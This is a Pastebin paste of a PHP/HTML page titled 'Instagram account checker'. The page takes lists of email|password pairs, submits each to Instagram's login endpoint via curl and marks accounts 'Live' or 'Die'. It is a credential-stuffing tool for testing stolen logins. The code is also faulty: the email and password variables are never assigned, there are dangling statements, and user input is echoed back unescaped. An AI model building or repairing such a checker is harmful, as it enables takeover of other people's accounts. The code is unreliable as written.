Advertisement
Guest User

Untitled

a guest
Nov 8th, 2016
252
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.90 KB | None | 0 0
  1. <html>
  2. <head>
  3. <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
  4.  
  5. <!-- Bootstrap Start -->
  6. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/bootstrap.css">
  7. <link rel="stylesheet" href="http://themes.suggelab.com/dynamic/css/main.css">
  8. <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  9. <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js"></script>
  10.  
  11. <title>Instagram account checker </title>
  12. <style>
  13. body {
  14. padding-top: 60px;
  15. }
  16. </style>
  17. </head>
  18. <body>
  19. <div class="container">
  20. <center>Dah error mulu nich h3h3</CENTER>
  21. <div class="panel panel-primary panelMove toggle panelRefresh panelClose">
  22. <!-- Start .panel -->
  23. <div class="panel-heading">
  24. <h4 class="panel-title">Instagram acc ceker</h4>
  25. </div>
  26. <div class="panel-body">
  27. <form action="" method="POST">
  28. <textarea style="background:rgba(0,225,0,00);" name="mailpass" id="mailpass" style="width: 441px; height: 187px;" class="form-control" rows="7" placeholder="your@email.com|passW0rd"><?php
  29. if (isset($_POST['mailpass'])) {
  30. echo $_POST['mailpass'];
  31. }
  32. ?></textarea><br />
  33. <input type="text" style="width: 37px; height: 25px;" class="form-control" rows="7" name="delim" value="|">
  34. <button id=start value="WOOT" name="submit" class="btn btn-success">Check</button> <button id=stop value="WOOT" class="btn btn-success">Stop</button><br><br>
  35. <?php
  36. explode('@' , $mailpass);
  37. $format = $_POST['mailpass'];
  38. $pisah = explode("|", $format);
  39. $hasil=
  40. $result = array();
  41.  
  42.  
  43. $dir = dirname(__FILE__);
  44. $config = $dir . '/_cook/' .rand(1,999999999999999). '.txt';
  45. if (!file_exists($config)) {
  46. $fp = @fopen($config, 'w');
  47. @fclose($fp);
  48. }
  49.  
  50. $cookie = 'cookie.txt';
  51. $ch = curl_init('https://instagram.com/account/login');
  52. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  53. curl_setopt($ch,CURLOPT_POST,1);
  54. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
  55. curl_setopt($ch,CURLOPT_POST,TRUE);
  56. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,TRUE);
  57. curl_setopt($ch,CURLOPT_COOKIEFILE, "$config");
  58. curl_setopt($ch,CURLOPT_COOKIEJAR, "$config");
  59. curl_setopt($ch,CURLOPT_POSTFIELDS,"username=$email&password=$pass&Submit=login");
  60. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  61. $result = curl_exec($ch);
  62. $now = "<i style=\"color:blue\">Checked on Localhost at ".date("g:i a - F j, Y")."</i>";
  63. if(empty($result));
  64. elseif(preg_match('/Sorry, your password was incorrect. Please double-check your password./i',$result)){
  65. echo "<font color=red><b>Die</b></font> => ".$email."|".$pass." | ".$now."<br/>";
  66. }else{
  67. echo "<font color=green><b>Live</b></font> => ".$mailpass." | [ACC : instagram] | ".$now."<br/>"; }
  68.  
  69.  
  70.  
  71.  
  72. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement